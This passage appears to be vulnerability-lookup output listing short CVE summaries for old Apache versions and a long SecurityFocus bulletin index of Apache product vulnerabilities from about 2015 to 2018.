13683| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
13684| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
13685| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
13686| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
13687| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
13688| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13689| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13690| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13691| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13692| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13693| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13694| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13695| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13696| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13697| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13698| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13699| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13700| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13701| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13702| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13703| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13704| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13705|
13706| SecurityFocus - https://www.securityfocus.com/bid/:
13707| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13708| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13709| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13710| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13711| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13712| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13713| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13714| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13715| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13716| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13717| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13718| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13719| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13720| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13721| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13722| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13723| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13724| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13725| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13726| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13727| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13728| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13729| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13730| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13731| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13732| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13733| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13734| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13735| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13736| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13737| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13738| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13739| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13740| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13741| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13742| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13743| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13744| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13745| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13746| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13747| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13748| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13749| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13750| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13751| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13752| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13753| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13754| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13755| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13756| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13757| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13758| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13759| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13760| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13761| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13762| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13763| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13764| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13765| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13766| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13767| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13768| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13769| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13770| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13771| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13772| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13773| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13774| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13775| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13776| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13777| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13778| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13779| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13780| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13781| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13782| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13783| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13784| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13785| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13786| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13787| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13788| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13789| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13790| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13791| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
13792| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
13793| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
13794| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
13795| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
13796| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
13797| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
13798| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
13799| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
13800| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
13801| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
13802| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
13803| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
13804| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
13805| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
13806| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
13807| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
13808| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
| [100447] Apache2Triad Multiple Security Vulnerabilities
| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
| [95675] Apache Struts Remote Code Execution Vulnerability
| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
| [91736] Apache XML-RPC Multiple Security Vulnerabilities
| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
| [90482] Apache CVE-2004-1387 Local Security Vulnerability
| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
| [86399] Apache CVE-2007-1743 Local Security Vulnerability
| [86397] Apache CVE-2007-1742 Local Security Vulnerability
| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
